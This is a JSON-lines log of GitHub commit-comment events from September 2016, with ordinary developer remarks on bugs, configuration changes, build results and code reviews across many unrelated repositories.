{"id":"4598245373","type":"CommitCommentEvent","actor":{"login":"chimurai"},"repo":{"name":"chimurai/http-proxy-middleware"},"payload":{"comment":{"id":19118865,"position":null,"line":null,"path":null,"commit_id":"53fe79b6c36ca4034c3fd68ffb29bcc81d84e576","created_at":"2016-09-21T18:59:17Z","updated_at":"2016-09-21T18:59:17Z","body":"Hi @julbra.\r\nAs you already discovered, there is still no solution for browser-sync and websockets proxy.\r\nWondering if this memory leak issue is isolated to browser-sync or is it also reproducable in `express` or `connect`?"}},"created_at":"2016-09-21T18:59:17Z"}
{"id":"4598245992","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19118866,"position":null,"line":null,"path":null,"commit_id":"3176297091690e88f93260a3f15d2e7be21bafcd","created_at":"2016-09-21T18:59:24Z","updated_at":"2016-09-21T18:59:24Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;u2YsyO1Z&#x2F;57-navbar-make-logos-unclickable\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Navbar - make logos unclickable</a>"}},"created_at":"2016-09-21T18:59:24Z"}
{"id":"4598246411","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19118868,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-21T18:59:29Z","updated_at":"2016-09-21T18:59:29Z","body":"develop (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-21T18:59:29Z"}
{"id":"4598246606","type":"CommitCommentEvent","actor":{"login":"raydittmeier"},"repo":{"name":"USGS-EROS/espa-product-formatter"},"payload":{"comment":{"id":19118870,"position":null,"line":null,"path":null,"commit_id":"5a66533fbc63f246f32fa5077f94a73480e32797","created_at":"2016-09-21T18:59:31Z","updated_at":"2016-09-21T18:59:31Z","body":"I tested 8 scenarios with this change within the cli.py program (which also runs warp.py) including a prime meridian scene, \"regular\" scenes, and 180-crossing scenes.  They all looked good.  The only comment I have is a repeat of Ron's (wondering if it would be better to protect the ascending scenes from having meridian_crossing set by the descenging scene 180-crossing tests).  We discussed the change before commenting, checking scenarios like meridian crossing between UL and LL or UR and LR."}},"created_at":"2016-09-21T18:59:31Z"}
{"id":"4598247969","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19118874,"position":13,"line":91,"path":"pom.xml","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T18:59:46Z","updated_at":"2016-09-21T18:59:46Z","body":"This dependency is added for you by the plugin."}},"created_at":"2016-09-21T18:59:46Z"}
{"id":"4598251586","type":"CommitCommentEvent","actor":{"login":"ximex"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":19118884,"position":null,"line":null,"path":null,"commit_id":"f5ef0e5057e10fb312ce83ddf0264b31bde12e0f","created_at":"2016-09-21T19:00:22Z","updated_at":"2016-09-21T19:00:22Z","body":"@Fasse could it be that it is a problem with PHP 5.3 or so?\r\nI reverted this and i couldn't find an error.\r\n\r\nCould you try to get an error and send me the error message or so? Maybe there is a real bug at another point in the code. But this really dosn't make sence to me..."}},"created_at":"2016-09-21T19:00:22Z"}
{"id":"4598253671","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19118889,"position":9,"line":30,"path":"src/main/webapp/WEB-INF/shiro.ini","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T19:00:42Z","updated_at":"2016-09-21T19:00:42Z","body":"Disable all session tracking in Shiro (cookies and url rewriting)"}},"created_at":"2016-09-21T19:00:42Z"}
{"id":"4598255916","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19118893,"position":null,"line":null,"path":null,"commit_id":"a1b7121e5f5c210d82cc1ad0e692aa0f0db2177f","created_at":"2016-09-21T19:01:06Z","updated_at":"2016-09-21T19:01:06Z","body":"fast-forwarding develop-2.2 to borshop-integration-862-feature-bjs-lager3.2.1 = 8403d623"}},"created_at":"2016-09-21T19:01:06Z"}
{"id":"4598257189","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19118897,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-21T19:01:20Z","updated_at":"2016-09-21T19:01:20Z","body":"Paul pour Minecraft envois les message dans antoinepaul"}},"created_at":"2016-09-21T19:01:20Z"}
{"id":"4598258073","type":"CommitCommentEvent","actor":{"login":"BurtHarris"},"repo":{"name":"BurtHarris/antlr4"},"payload":{"comment":{"id":19118899,"position":null,"line":null,"path":null,"commit_id":"a26c19c759e428f349ff5028f5459878e43fdcf1","created_at":"2016-09-21T19:01:30Z","updated_at":"2016-09-21T19:01:30Z","body":"With these changes, I think most of the errors that TypeScript reports may be genuine, with the possible exception of stuff in the area of `Tree.ts`."}},"created_at":"2016-09-21T19:01:30Z"}
{"id":"4598266380","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19118922,"position":19,"line":34,"path":"src/main/webapp/WEB-INF/shiro.ini","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T19:03:02Z","updated_at":"2016-09-21T19:03:02Z","body":"The stormpathClient is created for you and has access to  stormpath* environment variables and system properties."}},"created_at":"2016-09-21T19:03:02Z"}
{"id":"4598270455","type":"CommitCommentEvent","actor":{"login":"HardLight"},"repo":{"name":"opengapps/all"},"payload":{"comment":{"id":19118930,"position":null,"line":null,"path":null,"commit_id":"558f6852f084ff700b2091773748ae0367a78295","created_at":"2016-09-21T19:03:50Z","updated_at":"2016-09-21T19:03:50Z","body":"This commit broke com.google.android.media.effects.jar and com.google.widevine.software.drm.jar on cm12.1. I'm getting this on boot:\r\n`E/dex2oat ( 3257): Failed to open dex from file descriptor for zip file '/system/framework/com.google.widevine.software.drm.jar': Failed to open dex file '/system/framework/com.google.widevine.software.drm.jar' from memory: Unrecognized version number in /system/framework/com.google.widevine.software.drm.jar: 0 3 7 \r\nE/dex2oat ( 3258): Failed to open dex from file descriptor for zip file '/system/framework/com.google.android.media.effects.jar': Failed to open dex file '/system/framework/com.google.android.media.effects.jar' from memory: Unrecognized version number in /system/framework/com.google.android.media.effects.jar: 0 3 7 `"}},"created_at":"2016-09-21T19:03:50Z"}
{"id":"4598270904","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19118932,"position":28,"line":42,"path":"src/main/webapp/WEB-INF/shiro.ini","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T19:03:55Z","updated_at":"2016-09-21T19:03:55Z","body":"The realm is created for you as well."}},"created_at":"2016-09-21T19:03:55Z"}
{"id":"4598271587","type":"CommitCommentEvent","actor":{"login":"cxreg"},"repo":{"name":"nodesource/nsolid-statsd"},"payload":{"comment":{"id":19118936,"position":16,"line":18,"path":"lib/nsolid.js","commit_id":"54a9dfdc58ac4fcf1ae38b409f7eb10af7598f9c","created_at":"2016-09-21T19:04:02Z","updated_at":"2016-09-21T19:04:02Z","body":"Whoops missed this option in the culling, good catch"}},"created_at":"2016-09-21T19:04:02Z"}
{"id":"4598274133","type":"CommitCommentEvent","actor":{"login":"Juanmabs22"},"repo":{"name":"vabarca/WittyCloudTest"},"payload":{"comment":{"id":19118942,"position":null,"line":null,"path":null,"commit_id":"5943069d438feb5cec3ac2f54541b4d2b8b0485a","created_at":"2016-09-21T19:04:29Z","updated_at":"2016-09-21T19:04:29Z","body":"Not very good idea share with internet your SSID % password :P "}},"created_at":"2016-09-21T19:04:29Z"}
{"id":"4598277649","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19118952,"position":39,"line":59,"path":"src/main/webapp/WEB-INF/shiro.ini","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T19:05:11Z","updated_at":"2016-09-21T19:05:11Z","body":"Stormpath's default login page is `/login`.  To keep the URL consistent with the previous version of this application set it to `/login.jsp`"}},"created_at":"2016-09-21T19:05:11Z"}
{"id":"4598284052","type":"CommitCommentEvent","actor":{"login":"Ryuno-Ki"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19118967,"position":null,"line":null,"path":null,"commit_id":"46799e7206736db0e03b7ce6f6dc9e30fadd5fd7","created_at":"2016-09-21T19:06:18Z","updated_at":"2016-09-21T19:06:18Z","body":"Yeah, I was about to suggest to set the value as expression - but then looked up to see it's a .yml.\r\n\r\nIn my projects I use to write it like\r\n```yml\r\n    maxRunTime: 10800,  # = 3 * 60 * 60 seconds\r\n```"}},"created_at":"2016-09-21T19:06:18Z"}
{"id":"4598287138","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19118980,"position":21,"line":39,"path":"src/main/webapp/WEB-INF/web.xml","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T19:06:51Z","updated_at":"2016-09-21T19:06:51Z","body":"All gone!\r\nThis is configured via a servlet fragment in the `stormpath-shiro-servlet-plugin` jar"}},"created_at":"2016-09-21T19:06:51Z"}
{"id":"4598287428","type":"CommitCommentEvent","actor":{"login":"supergirl630"},"repo":{"name":"supergirl630/datanerd"},"payload":{"comment":{"id":19118981,"position":null,"line":null,"path":null,"commit_id":"9b15ccd34299bbf3930154bffd26aa9e95c78b50","created_at":"2016-09-21T19:06:54Z","updated_at":"2016-09-21T19:06:54Z","body":"![rplot02](https://cloud.githubusercontent.com/assets/11076486/18725124/fd62c466-800c-11e6-9007-cfaff0f73e44.png)\r\n"}},"created_at":"2016-09-21T19:06:54Z"}
{"id":"4598288847","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19118985,"position":5,"line":40,"path":"src/main/webapp/account/index.jsp","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T19:07:10Z","updated_at":"2016-09-21T19:07:10Z","body":"logouts are now POST requests"}},"created_at":"2016-09-21T19:07:10Z"}
{"id":"4598297833","type":"CommitCommentEvent","actor":{"login":"Piorjade"},"repo":{"name":"Piorjade/cLinux"},"payload":{"comment":{"id":19119008,"position":210,"line":769,"path":"sys/os.lua","commit_id":"0fa4bff58d899b4602b68a9544af657f06cbe0e9","created_at":"2016-09-21T19:08:36Z","updated_at":"2016-09-21T19:08:36Z","body":"Here it loads normally inside the Terminal Window. No bugs were found."}},"created_at":"2016-09-21T19:08:36Z"}
{"id":"4598298910","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Guadalayians"},"payload":{"comment":{"id":19119010,"position":null,"line":null,"path":null,"commit_id":"d75268c6dd76a11db8fbb8dc8c76d0ac8a41d060","created_at":"2016-09-21T19:08:48Z","updated_at":"2016-09-21T19:08:48Z","body":"I just want to thank you guys for protecting taking care thank you"}},"created_at":"2016-09-21T19:08:48Z"}
{"id":"4598299502","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19119012,"position":20,"line":20,"path":"src/main/webapp/assets/css/custom.stormpath.css","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T19:08:55Z","updated_at":"2016-09-21T19:08:55Z","body":"The previous version of the application had a custom login page.\r\nThis example does not attempt to replicate the same styling, but if you don't like the way the login page looks, you can theme the way you want."}},"created_at":"2016-09-21T19:08:55Z"}
{"id":"4598300495","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19119016,"position":5,"line":45,"path":"src/main/webapp/home.jsp","commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T19:09:05Z","updated_at":"2016-09-21T19:09:05Z","body":"Don't forget, logouts are now POST requests"}},"created_at":"2016-09-21T19:09:05Z"}
{"id":"4598301611","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19119020,"position":null,"line":null,"path":null,"commit_id":"88df23c08f57b6d1e6ff5999a5ca9b18ac9de8a0","created_at":"2016-09-21T19:09:17Z","updated_at":"2016-09-21T19:09:17Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/521/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=WW-329)."}},"created_at":"2016-09-21T19:09:17Z"}
{"id":"4598302383","type":"CommitCommentEvent","actor":{"login":"Piorjade"},"repo":{"name":"Piorjade/cLinux"},"payload":{"comment":{"id":19119023,"position":226,"line":771,"path":"sys/os.lua","commit_id":"0fa4bff58d899b4602b68a9544af657f06cbe0e9","created_at":"2016-09-21T19:09:26Z","updated_at":"2016-09-21T19:09:26Z","body":"And this one lets tasks.resume redirect to \"d\" (the program's window) and if the program does not yield, the OS won't go back to lTerm."}},"created_at":"2016-09-21T19:09:26Z"}
{"id":"4598306863","type":"CommitCommentEvent","actor":{"login":"bdemers"},"repo":{"name":"stormpath/stormpath-shiro-migrate-to-servlet-plugin"},"payload":{"comment":{"id":19119034,"position":null,"line":null,"path":null,"commit_id":"115171b9fb441e5a57b7a8c9bde3184a9bcde8e9","created_at":"2016-09-21T19:10:14Z","updated_at":"2016-09-21T19:10:14Z","body":"One less page to worry about!\r\nAnd besides the new one supports user registration and forget password workflows!"}},"created_at":"2016-09-21T19:10:14Z"}
{"id":"4598308780","type":"CommitCommentEvent","actor":{"login":"cgallati"},"repo":{"name":"cgallati/Unity-Example-Project"},"payload":{"comment":{"id":19119038,"position":null,"line":null,"path":null,"commit_id":"1b0591f3e15dc924fa742b17e475e92f58461497","created_at":"2016-09-21T19:10:36Z","updated_at":"2016-09-21T19:10:36Z","body":"Completed tutorial 3, not 2."}},"created_at":"2016-09-21T19:10:36Z"}
{"id":"4598314694","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":19119052,"position":7,"line":50,"path":"src/main/webapp/jsp/today-showing.jsp","commit_id":"7f19af12ac3fdda8e6eeb6c68f010095ff7279e3","created_at":"2016-09-21T19:11:43Z","updated_at":"2016-09-21T19:11:43Z","body":"waarom deze check? in r49 gebruik je dezelfde showPresentationVO.getShows() al, dus hij kan in r50 nooit null zijn"}},"created_at":"2016-09-21T19:11:43Z"}
{"id":"4598316130","type":"CommitCommentEvent","actor":{"login":"webfischi"},"repo":{"name":"zebra1993/Fortress-Craft-Evolved-Translation"},"payload":{"comment":{"id":19119053,"position":null,"line":null,"path":null,"commit_id":"9d8c0dd4692029f6d03137eea24914f37baa660b","created_at":"2016-09-21T19:11:59Z","updated_at":"2016-09-21T19:11:59Z","body":"Dass das so komisch ist, liegt daran, dass ich vergessen hatte den Pull Request selbst zu bestätigen und dann alles etwas durcheinandergekommen ist."}},"created_at":"2016-09-21T19:11:59Z"}
{"id":"4598316395","type":"CommitCommentEvent","actor":{"login":"TheMac"},"repo":{"name":"lukaszbanasiak/yahoo-finance"},"payload":{"comment":{"id":19119056,"position":null,"line":null,"path":null,"commit_id":"afdaa1f58c0ee1d239ad4024bfaf2b9758eb0b0e","created_at":"2016-09-21T19:12:02Z","updated_at":"2016-09-21T19:12:02Z","body":"Hi.\r\n\r\nI have installed version 1.2.1, but can't get \"get_name\" to work. I'm using Pycharm and it's auto-complet can't find it either. "}},"created_at":"2016-09-21T19:12:02Z"}
{"id":"4598322494","type":"CommitCommentEvent","actor":{"login":"n1kolaa"},"repo":{"name":"Grouper-AOSP/android_kernel_asus_grouper"},"payload":{"comment":{"id":19119080,"position":5,"line":453,"path":"arch/arm/configs/grouper_defconfig","commit_id":"1266d68bb1c08667ab2875ab0a8558ae8ce85d38","created_at":"2016-09-21T19:13:13Z","updated_at":"2016-09-21T19:13:13Z","body":"Hey? You eresed that N"}},"created_at":"2016-09-21T19:13:13Z"}
{"id":"4598325570","type":"CommitCommentEvent","actor":{"login":"sonora"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":19119094,"position":null,"line":null,"path":null,"commit_id":"a8dbab836b16d328bbbbb8dbbc0c04ab8f987b41","created_at":"2016-09-21T19:13:48Z","updated_at":"2016-09-21T19:13:48Z","body":"Alexey, cool, thanks!!  Tapping transport stops works great now, what is still missing is that we highlight (render) the route if you tap one of them on a transport stop's \"detail\" section (like we do when the transport layer is selected)."}},"created_at":"2016-09-21T19:13:48Z"}
{"id":"4598325625","type":"CommitCommentEvent","actor":{"login":"SeregaGit"},"repo":{"name":"igarvaloshen/spalah-good-good"},"payload":{"comment":{"id":19119095,"position":null,"line":null,"path":null,"commit_id":"09f68d51bf3f559984741e200aa6402f00b55022","created_at":"2016-09-21T19:13:49Z","updated_at":"2016-09-21T19:13:49Z","body":"Ahah! U menya oshushenie takoe 4to ya k 6 tolko lozhus'))"}},"created_at":"2016-09-21T19:13:49Z"}
{"id":"4598326918","type":"CommitCommentEvent","actor":{"login":"rileylnapier"},"repo":{"name":"symphony-snippets/pinterest-event-tracking"},"payload":{"comment":{"id":19119096,"position":2,"line":6,"path":"index.js","commit_id":"e71c95ba59b258a55cd32856e88c55cb5c9f888f","created_at":"2016-09-21T19:14:03Z","updated_at":"2016-09-21T19:14:03Z","body":"export default (config, pageType, order) => {\r\n\r\n//...\r\n\r\n}"}},"created_at":"2016-09-21T19:14:03Z"}
{"id":"4598328408","type":"CommitCommentEvent","actor":{"login":"kaganjd"},"repo":{"name":"kaganjd/p5.js-web-editor"},"payload":{"comment":{"id":19119100,"position":null,"line":null,"path":null,"commit_id":"4119d91812c6adcf13a297ac256811a5bbc7cd62","created_at":"2016-09-21T19:14:21Z","updated_at":"2016-09-21T19:14:21Z","body":"FRONT-END\r\n1. put trash-can in html\r\n2. adjust styling (appear on hover)\r\n3. on click, window.alert 'are you sure you want to delete?'\r\n4. redux: action.type deleteProject, which will trigger a new redux state\r\n5. then, redux changes react UI\r\n\r\ndispatch deleteProject action with the id\r\nin sketch reducer, find the project with that id and remove it from the array of sketches\r\n\r\nactions > projects.js\r\n- \r\nreducers > projects js\r\n- ActionTypes.DELETE_PROJECT, state.filter\r\n\r\nreducer is initial state and action; reducer returns new state"}},"created_at":"2016-09-21T19:14:21Z"}
{"id":"4598331687","type":"CommitCommentEvent","actor":{"login":"rileylnapier"},"repo":{"name":"symphony-snippets/pinterest-event-tracking"},"payload":{"comment":{"id":19119109,"position":31,"line":35,"path":"index.js","commit_id":"e71c95ba59b258a55cd32856e88c55cb5c9f888f","created_at":"2016-09-21T19:14:58Z","updated_at":"2016-09-21T19:14:58Z","body":"put these at top"}},"created_at":"2016-09-21T19:14:58Z"}
{"id":"4598333145","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"GoogleCloudPlatform/appengine-plugins-core"},"payload":{"comment":{"id":19119112,"position":null,"line":null,"path":null,"commit_id":"20e31ee78188599e5de557b003c05e513897e471","created_at":"2016-09-21T19:15:14Z","updated_at":"2016-09-21T19:15:14Z","body":"@loosebazooka PTAL"}},"created_at":"2016-09-21T19:15:14Z"}
{"id":"4598335369","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":19119116,"position":9,"line":52,"path":"src/main/webapp/jsp/today-showing.jsp","commit_id":"7f19af12ac3fdda8e6eeb6c68f010095ff7279e3","created_at":"2016-09-21T19:15:39Z","updated_at":"2016-09-21T19:15:39Z","body":"r51+r52 zou je kunnen combineren tot het beknoptere `<% String soldOut = showPresentationVO.getSoldOut() ? \"*\" : \"\"; %>`"}},"created_at":"2016-09-21T19:15:39Z"}
{"id":"4598337398","type":"CommitCommentEvent","actor":{"login":"rileylnapier"},"repo":{"name":"symphony-snippets/pinterest-event-tracking"},"payload":{"comment":{"id":19119123,"position":6,"line":6,"path":"order-complete-events.js","commit_id":"e71c95ba59b258a55cd32856e88c55cb5c9f888f","created_at":"2016-09-21T19:16:02Z","updated_at":"2016-09-21T19:16:02Z","body":"feu.whenReady(() => window.pintrk)\r\n.then((pintrk)=> pintrk(`track`, `checkout`))\r\n.catch((err) => {\r\n  console.error(`Pinterest error:`,err);\r\n});"}},"created_at":"2016-09-21T19:16:02Z"}
{"id":"4598340298","type":"CommitCommentEvent","actor":{"login":"rileylnapier"},"repo":{"name":"symphony-snippets/pinterest-event-tracking"},"payload":{"comment":{"id":19119133,"position":3,"line":3,"path":"product-events.js","commit_id":"e71c95ba59b258a55cd32856e88c55cb5c9f888f","created_at":"2016-09-21T19:16:33Z","updated_at":"2016-09-21T19:16:33Z","body":"not sending data about the add to cart?"}},"created_at":"2016-09-21T19:16:33Z"}
{"id":"4598342651","type":"CommitCommentEvent","actor":{"login":"fschutte"},"repo":{"name":"Cerios/cerioscoop-web"},"payload":{"comment":{"id":19119142,"position":11,"line":54,"path":"src/main/webapp/jsp/today-showing.jsp","commit_id":"7f19af12ac3fdda8e6eeb6c68f010095ff7279e3","created_at":"2016-09-21T19:17:01Z","updated_at":"2016-09-21T19:17:01Z","body":"Je hebt nu zoveel accolades dat je vast niet meer ziet wat waar bij hoort. Je hebt er dan ook meer dan nodig;)\r\n"}},"created_at":"2016-09-21T19:17:01Z"}
{"id":"4598343942","type":"CommitCommentEvent","actor":{"login":"Depechie"},"repo":{"name":"AppCreativity/Kliva"},"payload":{"comment":{"id":19119145,"position":null,"line":null,"path":null,"commit_id":"64989308940b7c72d51bf8fe222544de5287445c","created_at":"2016-09-21T19:17:15Z","updated_at":"2016-09-21T19:17:15Z","body":"Fixes #26"}},"created_at":"2016-09-21T19:17:15Z"}
{"id":"4598346566","type":"CommitCommentEvent","actor":{"login":"loosebazooka"},"repo":{"name":"GoogleCloudPlatform/appengine-plugins-core"},"payload":{"comment":{"id":19119152,"position":null,"line":null,"path":null,"commit_id":"20e31ee78188599e5de557b003c05e513897e471","created_at":"2016-09-21T19:17:47Z","updated_at":"2016-09-21T19:17:47Z","body":":ship: "}},"created_at":"2016-09-21T19:17:47Z"}
{"id":"4598348375","type":"CommitCommentEvent","actor":{"login":"apinela"},"repo":{"name":"Grouper-AOSP/android_kernel_asus_grouper"},"payload":{"comment":{"id":19119156,"position":5,"line":453,"path":"arch/arm/configs/grouper_defconfig","commit_id":"1266d68bb1c08667ab2875ab0a8558ae8ce85d38","created_at":"2016-09-21T19:18:08Z","updated_at":"2016-09-21T19:18:08Z","body":"it will be fixed soon, but tanks."}},"created_at":"2016-09-21T19:18:08Z"}
{"id":"4598356372","type":"CommitCommentEvent","actor":{"login":"thichhack"},"repo":{"name":"thichhackhehe/thichhack"},"payload":{"comment":{"id":19119170,"position":null,"line":null,"path":null,"commit_id":"48040353a927cb08198a37132deadd9695ff9168","created_at":"2016-09-21T19:19:38Z","updated_at":"2016-09-21T19:19:38Z","body":"readme finish"}},"created_at":"2016-09-21T19:19:38Z"}
{"id":"4598356618","type":"CommitCommentEvent","actor":{"login":"bertilxi"},"repo":{"name":"bertilxi/Olimpo"},"payload":{"comment":{"id":19119172,"position":null,"line":null,"path":null,"commit_id":"d58c79e2d1bd093314797d6f449c334dd80922ab","created_at":"2016-09-21T19:19:41Z","updated_at":"2016-09-21T19:19:41Z","body":"OK, mala mia. Podrias haber hecho un revert a lo que ya habias hecho y listo"}},"created_at":"2016-09-21T19:19:41Z"}
{"id":"4598357143","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19119174,"position":null,"line":null,"path":null,"commit_id":"fd26de511db0ac7c5638311caa0abf0cbe36c1c9","created_at":"2016-09-21T19:19:46Z","updated_at":"2016-09-21T19:19:46Z","body":"Thanks @adamdbradley would send a PR later ;)"}},"created_at":"2016-09-21T19:19:46Z"}
{"id":"4598357688","type":"CommitCommentEvent","actor":{"login":"brunoemori"},"repo":{"name":"Alpaca-kun/MORSE_PIC"},"payload":{"comment":{"id":19119176,"position":null,"line":null,"path":null,"commit_id":"7f994896d685dad8038f0fc39fe4d39d7723d6ee","created_at":"2016-09-21T19:19:54Z","updated_at":"2016-09-21T19:19:54Z","body":"Teste"}},"created_at":"2016-09-21T19:19:54Z"}
{"id":"4598363636","type":"CommitCommentEvent","actor":{"login":"siggi89"},"repo":{"name":"siggi89/EC601-Homework1"},"payload":{"comment":{"id":19119186,"position":null,"line":null,"path":null,"commit_id":"cb81ac03ae435b857e4bea0ddd75da897f2cb783","created_at":"2016-09-21T19:21:01Z","updated_at":"2016-09-21T19:21:01Z","body":"Changes made by Jingwei. Swap around order of data printed. Added column app connection."}},"created_at":"2016-09-21T19:21:01Z"}
{"id":"4598365675","type":"CommitCommentEvent","actor":{"login":"sonora"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":19119191,"position":null,"line":null,"path":null,"commit_id":"a8dbab836b16d328bbbbb8dbbc0c04ab8f987b41","created_at":"2016-09-21T19:21:24Z","updated_at":"2016-09-21T19:21:24Z","body":"PS: Manually setting the tick box next to \"transport stops\" on the Transport layer menu after a route has been selected fixes this and displays the selected route and its stops on the map all right, so I guess it is only a small glitch that the transport layer should be activated temporarily while a route is to be displayed."}},"created_at":"2016-09-21T19:21:24Z"}
{"id":"4598366812","type":"CommitCommentEvent","actor":{"login":"Pondy9496"},"repo":{"name":"Pondy9496/exercise-repo"},"payload":{"comment":{"id":19119192,"position":1,"line":1,"path":"README.md","commit_id":"6fa8ffd16b0f25a3e2cebd3541616a8f397a8e59","created_at":"2016-09-21T19:21:37Z","updated_at":"2016-09-21T19:21:37Z","body":"# Pandy + Pony = Pondy"}},"created_at":"2016-09-21T19:21:37Z"}
{"id":"4598374236","type":"CommitCommentEvent","actor":{"login":"Murulidhar"},"repo":{"name":"iovisor/bcc"},"payload":{"comment":{"id":19119209,"position":null,"line":null,"path":null,"commit_id":"52938058460cadac111234b92fd0018c03327e92","created_at":"2016-09-21T19:22:58Z","updated_at":"2016-09-21T19:22:58Z","body":"hi,\r\nPlease let me know how to solve import bcc error."}},"created_at":"2016-09-21T19:22:58Z"}
{"id":"4598374278","type":"CommitCommentEvent","actor":{"login":"protodef"},"repo":{"name":"protodef/agens-graph"},"payload":{"comment":{"id":19119210,"position":null,"line":null,"path":null,"commit_id":"452ff4d12b5b58ce1e184833cd6d3d0a21ca1a1a","created_at":"2016-09-21T19:22:58Z","updated_at":"2016-09-21T19:22:58Z","body":"Other describe functions in `describe.c` all do LEFT JOIN. That's it. I don't know exactly how PostgreSQL optimize those joins."}},"created_at":"2016-09-21T19:22:58Z"}
{"id":"4598374857","type":"CommitCommentEvent","actor":{"login":"The-Compiler"},"repo":{"name":"The-Compiler/qutebrowser"},"payload":{"comment":{"id":19119211,"position":null,"line":null,"path":null,"commit_id":"57d896e98970151ee673145dcbe63a750600029b","created_at":"2016-09-21T19:23:05Z","updated_at":"2016-09-21T19:23:05Z","body":"Whoops, #1963..."}},"created_at":"2016-09-21T19:23:05Z"}
{"id":"4598377023","type":"CommitCommentEvent","actor":{"login":"abrotman"},"repo":{"name":"mrisher/smtp-sts"},"payload":{"comment":{"id":19119219,"position":null,"line":null,"path":null,"commit_id":"281fdd0857d926f3e4a55da32d793584a31d9b42","created_at":"2016-09-21T19:23:30Z","updated_at":"2016-09-21T19:23:30Z","body":"Merge it, we'll take a look at the rest of the issues in the tracker and see what other changes might need to be made."}},"created_at":"2016-09-21T19:23:30Z"}
{"id":"4598383012","type":"CommitCommentEvent","actor":{"login":"taion"},"repo":{"name":"facebook/relay"},"payload":{"comment":{"id":19119229,"position":null,"line":null,"path":null,"commit_id":"ba05332044ab8e68890f63a875514211ee480908","created_at":"2016-09-21T19:24:40Z","updated_at":"2016-09-21T19:24:40Z","body":"Anything I can do to help? It's one of the last bits that's a bit messy in userspace subscription support, and there's not a good workaround.\r\n\r\nAlternatively, I wouldn't mind moving to using `clientMutationId` in subscriptions on our end, but I don't see a way to reach into `RelayMutationQueue` to get incrementing mutation IDs that are guaranteed to not conflict with those for actual mutations."}},"created_at":"2016-09-21T19:24:40Z"}
